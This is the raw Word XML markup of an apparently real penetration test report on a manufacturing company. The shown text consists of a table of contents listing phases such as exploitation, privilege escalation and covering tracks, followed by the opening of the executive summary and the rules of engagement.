            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777727" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2  Identifying Vulnerabilities</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777727 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777728" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3  Exploitation</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777728 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777729" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4  Post-Exploitation</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777729 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777730" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.1  Meterpreter</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777730 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777731" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.2  Privilege Escalation</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777731 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777732" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.3  Maintaining Access</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777732 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777733" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.4  Process Migration</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777733 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777734" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.5  Adding Accounts</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777734 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777735" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.5  Covering Tracks</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777735 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777736" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Conclusion</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777736 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777737" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1  Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777737 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777738" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. Appendices</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777738 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E20CC" w:rsidRDefault="00800C12">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2777739" w:history="1">
            <w:r w:rsidR="005E20CC" w:rsidRPr="00D24869">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. References</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2777739 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="005E20CC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E46162" w:rsidRDefault="00E46162">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00E46162" w:rsidRDefault="00E46162" w:rsidP="00553D30">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E46162" w:rsidRDefault="00E46162">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="007789" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C6554A" w:rsidRDefault="00553D30" w:rsidP="00553D30">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc2777717"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="001A5F79" w:rsidRDefault="00553D30" w:rsidP="00553D30">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is the final report on the penetration test performed on </w:t>
      </w:r>
      <w:r w:rsidR="00E572EA">
        <w:t xml:space="preserve">some named </w:t>
      </w:r>
      <w:r>
        <w:t>manufacturing company</w:t>
      </w:r>
      <w:r w:rsidR="00E572EA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C6554A" w:rsidRDefault="00E572EA" w:rsidP="00553D30">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This company </w:t>
      </w:r>
      <w:r w:rsidR="00553D30">
        <w:t>made the decision to tender for military contracts, they had to ensure their systems were effectively secured and resilient to attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003618AB" w:rsidRPr="00514122" w:rsidRDefault="002D1007" w:rsidP="00553D30">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The company employed a penetration tester to plan and carry out an attack in a manner that a malicious attacker would attempt to breach the companies’ systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C6554A" w:rsidRDefault="003618AB" w:rsidP="003618AB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc2777718"/>
      <w:r>
        <w:t>Rules of Engagement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="003618AB" w:rsidRDefault="000A0064" w:rsidP="003618AB">
      <w:r>
        <w:t>Any and all processes or steps taken during this test strictly adhered to the OSSTMM and the standards s</w:t>
      </w:r>
      <w:r w:rsidR="00E46162">
        <w:t>et by the OWASP testing project.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00561309" w:rsidRDefault="00561309" w:rsidP="00E46162">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc2777719"/>
      <w:r>
        <w:t xml:space="preserve">1.1.1 </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00561309" w:rsidRDefault="00561309" w:rsidP="00561309">
      <w:r>
        <w:t>Before the attack could be carried out, information relevant to the company and their computer systems had to be gathered, this was</w:t>
      </w:r>
